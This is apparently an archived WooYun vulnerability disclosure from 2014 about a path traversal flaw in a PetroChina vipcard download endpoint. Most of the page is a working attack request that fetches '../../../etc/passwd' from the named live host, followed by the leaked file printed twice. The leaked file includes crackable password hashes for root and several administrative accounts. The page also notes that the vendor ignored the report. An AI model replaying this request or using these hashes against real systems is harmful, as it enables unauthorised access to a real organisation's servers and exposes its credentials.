乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-01: 细节已通知厂商并且等待厂商处理中 2014-12-06: 厂商已经主动忽略漏洞,细节向公众公开
.。。。。。。
GET /d/download/?fileName=../../../etc/passwd HTTP/1.1Referer: http://vipcard.petrochina.com.cn:80/Cookie: JSESSIONID=0000qxjZ61Nwj39N7iOFeTVqcVj:14png122dHost: vipcard.petrochina.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*root:25xCUpju5eo8U:0:3::/:/sbin/shdaemon:*:1:5::/:/sbin/shbin:*:2:2::/usr/bin:/sbin/shsys:*:3:3::/:adm:*:4:4::/var/adm:/sbin/shuucp:*:5:3::/var/spool/uucppublic:/usr/lbin/uucp/uucicolp:*:9:7::/var/spool/lp:/sbin/shnuucp:*:11:11::/var/spool/uucppublic:/usr/lbin/uucp/uucicohpdb:*:27:1:ALLBASE:/:/sbin/shnobody:*:-2:-2::/:www:*:30:1::/:smbnull:*:101:101:DO NOT USE OR DELETE - needed by Samba:/var/opt/samba/nologin:/bin/falsecimsrvr:*:102:102:WBEM Services:/var/opt/wbem:/sbin/shsfmdb:*:103:20::/home/sfmdb:/sbin/shsshd:*:104:103:sshd privsep:/var/empty:/bin/falseiwww:*:105:1::/home/iwww:/sbin/showww:*:106:1::/home/owww:/sbin/shhpsmh:*:107:104:System Management Homepage:/var/opt/hpsmh:/sbin/shtftp:*:108:105:Trivial FTP user:/home/tftp:/usr/bin/falsewas:2.8KQGG5whM92:200:200:websphere:/home/was:/sbin/shadm01:hgBBfl5PCSpLc:109:20::/home/adm01:/sbin/shjyzadm:V73v3HSO3v03k:110:20::/home/jyzadm:/bin/cshopc_op:*:777:177:OVO default operator:/home/opc_op:/sbin/sh
root:25xCUpju5eo8U:0:3::/:/sbin/shdaemon:*:1:5::/:/sbin/shbin:*:2:2::/usr/bin:/sbin/shsys:*:3:3::/:adm:*:4:4::/var/adm:/sbin/shuucp:*:5:3::/var/spool/uucppublic:/usr/lbin/uucp/uucicolp:*:9:7::/var/spool/lp:/sbin/shnuucp:*:11:11::/var/spool/uucppublic:/usr/lbin/uucp/uucicohpdb:*:27:1:ALLBASE:/:/sbin/shnobody:*:-2:-2::/:www:*:30:1::/:smbnull:*:101:101:DO NOT USE OR DELETE - needed by Samba:/var/opt/samba/nologin:/bin/falsecimsrvr:*:102:102:WBEM Services:/var/opt/wbem:/sbin/shsfmdb:*:103:20::/home/sfmdb:/sbin/shsshd:*:104:103:sshd privsep:/var/empty:/bin/falseiwww:*:105:1::/home/iwww:/sbin/showww:*:106:1::/home/owww:/sbin/shhpsmh:*:107:104:System Management Homepage:/var/opt/hpsmh:/sbin/shtftp:*:108:105:Trivial FTP user:/home/tftp:/usr/bin/falsewas:2.8KQGG5whM92:200:200:websphere:/home/was:/sbin/shadm01:hgBBfl5PCSpLc:109:20::/home/adm01:/sbin/shjyzadm:V73v3HSO3v03k:110:20::/home/jyzadm:/bin/cshopc_op:*:777:177:OVO default operator:/home/opc_op:/sbin/sh
啥也不说了,你们应该了解。
危害等级:无影响厂商忽略
忽略时间:2014-12-06 20:40
暂无